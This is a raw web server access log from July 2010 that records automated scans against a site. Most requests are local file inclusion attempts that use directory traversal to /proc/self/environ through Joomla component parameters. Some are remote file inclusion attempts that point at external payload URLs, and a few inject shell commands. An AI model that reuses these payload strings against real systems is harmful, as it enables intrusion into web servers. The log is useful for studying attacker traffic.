193.43.92.192 - - [26/Jul/2010:12:43:00 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.836"
78.41.233.128 - - [26/Jul/2010:12:47:07 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:12:47:08 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
78.41.233.128 - - [26/Jul/2010:12:47:08 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
66.7.221.56 - - [26/Jul/2010:12:54:55 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:54:55 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:54:56 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:55:11 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:55:11 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.834"
66.7.221.56 - - [26/Jul/2010:12:55:11 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.834"
81.208.34.38 - - [26/Jul/2010:13:00:26 +0200] "GET /logs/access_log/akocomments.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
193.43.92.192 - - [26/Jul/2010:13:03:24 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:13:03:24 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:13:03:24 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:13:03:28 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:13:03:32 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.836"
193.43.92.192 - - [26/Jul/2010:13:03:32 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.836"
87.233.155.149 - - [26/Jul/2010:13:10:12 +0200] "GET /logs//?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 801 "-" "libwww-perl/5.79"
87.233.155.149 - - [26/Jul/2010:13:10:12 +0200] "GET //?option=com_dioneformwizard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 665 "-" "libwww-perl/5.79"
174.121.240.147 - - [26/Jul/2010:13:13:44 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:13:13:44 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:13:13:45 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:13:15:13 +0200] "GET /logs/access_log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 313 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:13:15:14 +0200] "GET ///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-" "libwww-perl/5.810"
174.121.240.147 - - [26/Jul/2010:13:15:14 +0200] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-" "libwww-perl/5.810"
66.187.106.151 - - [26/Jul/2010:13:16:22 +0200] "GET /logs/access_log////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:13:16:22 +0200] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-" "libwww-perl/5.831"
66.187.106.151 - - [26/Jul/2010:13:16:22 +0200] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-" "libwww-perl/5.831"
94.247.176.194 - - [26/Jul/2010:13:17:28 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:13:17:28 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
94.247.176.194 - - [26/Jul/2010:13:17:28 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
91.121.67.226 - - [26/Jul/2010:13:18:06 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:13:18:06 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
91.121.67.226 - - [26/Jul/2010:13:18:06 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
99.198.108.74 - - [26/Jul/2010:13:18:08 +0200] "GET /logs/access_log/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:13:18:09 +0200] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
99.198.108.74 - - [26/Jul/2010:13:18:09 +0200] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
83.165.195.143 - - [26/Jul/2010:13:20:02 +0200] "GET /logs/access_log HTTP/1.0" 200 135975 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12"
81.208.34.38 - - [26/Jul/2010:13:25:09 +0200] "GET /logs/access_log/akocomments.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 317 "-" "Mozilla/5.0"
211.202.2.34 - - [26/Jul/2010:13:29:14 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:29:14 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 300 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:29:14 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 295 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:29:15 +0200] "GET /logs/access_log/index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 311 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:29:15 +0200] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 300 "-" "MaMa CaSpEr"
211.202.2.34 - - [26/Jul/2010:13:29:15 +0200] "GET /index.php?option=com_ninjarsssyndicator&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 295 "-" "MaMa CaSpEr"
67.195.112.178 - - [26/Jul/2010:13:47:55 +0200] "GET /logs/error_log HTTP/1.0" 200 84309 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.238 - - [26/Jul/2010:13:48:42 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.149.110.213 - - [26/Jul/2010:13:50:48 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:50:48 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:50:48 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:50:48 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:50:51 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:50:51 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:51:39 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:51:39 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:51:42 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:13:51:42 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
92.43.201.28 - - [26/Jul/2010:13:53:01 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:53:02 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:55:10 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:55:13 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:56:28 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:13:56:29 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
195.199.244.244 - - [26/Jul/2010:13:58:12 +0200] "GET /logs/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.830"
195.199.244.244 - - [26/Jul/2010:13:58:13 +0200] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.830"
207.46.204.238 - - [26/Jul/2010:13:58:56 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.149.110.213 - - [26/Jul/2010:14:00:24 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:24 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:27 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:27 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:29 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:29 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:38 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:38 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:41 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:41 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:41 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
83.149.110.213 - - [26/Jul/2010:14:00:41 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
76.242.100.234 - - [26/Jul/2010:14:01:56 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
92.43.201.28 - - [26/Jul/2010:14:02:32 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:02:33 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
195.199.244.244 - - [26/Jul/2010:14:02:33 +0200] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.830"
92.43.201.28 - - [26/Jul/2010:14:04:03 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.813"
92.43.201.28 - - [26/Jul/2010:14:04:03 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
80.89.233.48 - - [26/Jul/2010:14:09:34 +0200] "GET /http://www.ncfphilippines.org/Vid.txt?? HTTP/1.1" 404 323 "-" "libwww-perl/5.79"
195.199.244.244 - - [26/Jul/2010:14:09:47 +0200] "GET /logs/access_log/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.830"
195.199.244.244 - - [26/Jul/2010:14:09:47 +0200] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.830"
195.199.244.244 - - [26/Jul/2010:14:09:47 +0200] "GET /logs/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.830"
76.242.100.234 - - [26/Jul/2010:14:13:48 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:14:13:55 +0200] "GET /logs//index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.831"
76.242.100.234 - - [26/Jul/2010:14:13:56 +0200] "GET //index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.831"
195.199.244.244 - - [26/Jul/2010:14:17:14 +0200] "GET /logs/access_log/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.830"
195.199.244.244 - - [26/Jul/2010:14:17:14 +0200] "GET /index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.830"
195.199.244.244 - - [26/Jul/2010:14:17:14 +0200] "GET /logs/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.830"
80.89.233.48 - - [26/Jul/2010:14:17:16 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
67.195.112.178 - - [26/Jul/2010:14:17:28 +0200] "GET /logs/?M=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.7.123 - - [26/Jul/2010:14:17:28 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:28 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:28 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:28 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:28 +0200] "GET /logs//index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:28 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:28 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
91.121.7.123 - - [26/Jul/2010:14:17:28 +0200] "GET //index.php?option=com_archeryscores&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.810"
